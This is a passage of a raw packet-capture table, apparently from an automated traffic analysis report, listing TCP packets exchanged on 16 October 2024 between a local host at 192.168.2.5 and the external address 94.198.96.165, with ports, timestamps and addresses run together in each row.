                                                                  Oct 16, 2024 13:08:19.723020077 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.723042011 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:19.723067045 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:19.723092079 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.810218096 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:19.943547964 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.943608046 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.943619967 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.943712950 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:19.943733931 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.943792105 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:19.943793058 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.943804979 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.943861961 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:19.943929911 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.944073915 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.944137096 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:19.944247007 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.944272995 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.944282055 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.944330931 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:19.944385052 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.944396019 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.944406986 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.944417953 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.944428921 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.944441080 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.944443941 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:19.944477081 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:19.944477081 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:19.944598913 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.944629908 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.944641113 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.944685936 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:19.944732904 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.944745064 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.944753885 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.944789886 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:19.945230007 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.945255995 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.945266962 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.945281982 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:19.945307016 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:19.945399046 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.945409060 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.945420027 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.945430994 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.945441961 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.945446968 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:19.945452929 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.945463896 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.945472002 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.945481062 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.945483923 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:19.945492029 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.945503950 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:19.945533037 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.945538044 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:19.945543051 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.945553064 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.945564032 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.945586920 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:19.945595980 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.945605040 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:19.945609093 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.945619106 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.945667982 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:19.946258068 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.946280003 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.946290016 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.946337938 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:19.946337938 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:19.946403980 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.946414948 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.946424961 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.946435928 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.946461916 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:19.946486950 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:19.946502924 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.946542025 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.946549892 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.946600914 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:19.949775934 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.949816942 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.949826002 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.949836969 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.949889898 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:19.949923038 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.949934006 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.949944019 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.949955940 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.949976921 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:19.950018883 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:19.950088024 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.950098991 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.950109005 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.950122118 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.950133085 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.950143099 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.950146914 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:19.950154066 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.950165033 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.950167894 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:19.950184107 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:19.950213909 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:19.950228930 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.950239897 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.950251102 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.950282097 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:19.950305939 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:19.950381041 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.950392008 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.950402021 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.950411081 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.950422049 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.950433969 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.950439930 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.950444937 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.950448036 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:19.950448036 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:19.950483084 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:19.950505972 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:19.950598955 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.950608969 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.950618982 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.950628996 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.950639009 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.950644016 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:19.950649023 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.950659990 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.950670004 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.950686932 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.950696945 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.950700045 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:19.950700045 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:19.950710058 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.950722933 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:19.950756073 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:19.950952053 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.950970888 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.950979948 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.951005936 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:19.951031923 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:19.951061010 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.951070070 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.951109886 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.951119900 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.951122999 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:19.951159954 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:19.951245070 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.951256037 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.951267004 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.951277018 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.951288939 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.951298952 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.951308966 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.951318979 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:19.951344967 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:19.951766968 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.951777935 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.951787949 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.951853037 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:19.951860905 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.951921940 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.951977015 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:19.952120066 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.952151060 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.952161074 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.952225924 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:19.952263117 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.952274084 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.952284098 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.952296019 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.952323914 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:19.952349901 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:19.952390909 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.952402115 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.952411890 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.952423096 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.952431917 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.952447891 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:19.952474117 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:19.952474117 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:19.953615904 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.953691006 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.953701973 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.953718901 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.953751087 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:19.953751087 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:19.953783989 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.953954935 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.953964949 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.953974009 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.953984976 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.953994989 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.954005003 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.954014063 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:19.954015017 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.954070091 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:19.954070091 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:19.954233885 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.954296112 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.954305887 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.954346895 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:19.954488039 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.954499006 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.954509974 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.954541922 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:19.954570055 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:19.955504894 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.955527067 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.955535889 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.955611944 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:19.955651045 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.955662012 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.955672026 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.955723047 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:19.955739975 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.955749035 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:19.955800056 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.955890894 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:19.956016064 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.956037045 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.956046104 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.956099987 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:19.956124067 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.956135988 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.956151009 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.956192017 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:19.956199884 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.956222057 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.956232071 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.956271887 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:19.956307888 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.956316948 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.956326962 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.956396103 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:19.957842112 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.957854033 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.957865000 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.957907915 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:19.957946062 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.957957983 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.957967997 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.958005905 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:19.958034039 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.958045006 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.958055019 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.958087921 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:19.958201885 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.958245039 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.958254099 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.958338976 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:19.958401918 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.958493948 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.958585978 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:19.966928959 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.172935963 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.172961950 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.173110008 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.174438953 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.174568892 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.174580097 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.174590111 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.174602032 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.174607038 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.174617052 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.174628019 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.174706936 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.174716949 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.174777031 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.174787045 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.174797058 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.174807072 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.174807072 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.174843073 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.174854040 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.174864054 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.174890041 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.174952984 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.175036907 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.175046921 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.175057888 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.175067902 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.175118923 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.175167084 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.175411940 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.175425053 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.175436020 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.175446033 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.175507069 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.175518990 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.175559044 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.175568104 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.175661087 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.178519011 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.178541899 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.178585052 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.178594112 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.178641081 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.178692102 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.178700924 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.178730011 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.178782940 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.178906918 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.178967953 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.178977013 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.179052114 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.179064989 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.179075003 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.179085016 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.179095030 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.179111004 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.179187059 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.179703951 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.179748058 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.179758072 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.179790020 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.179797888 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.179807901 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.179817915 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.179892063 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.179912090 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.179958105 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.179968119 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.179981947 CEST4989453848192.168.2.594.198.96.165
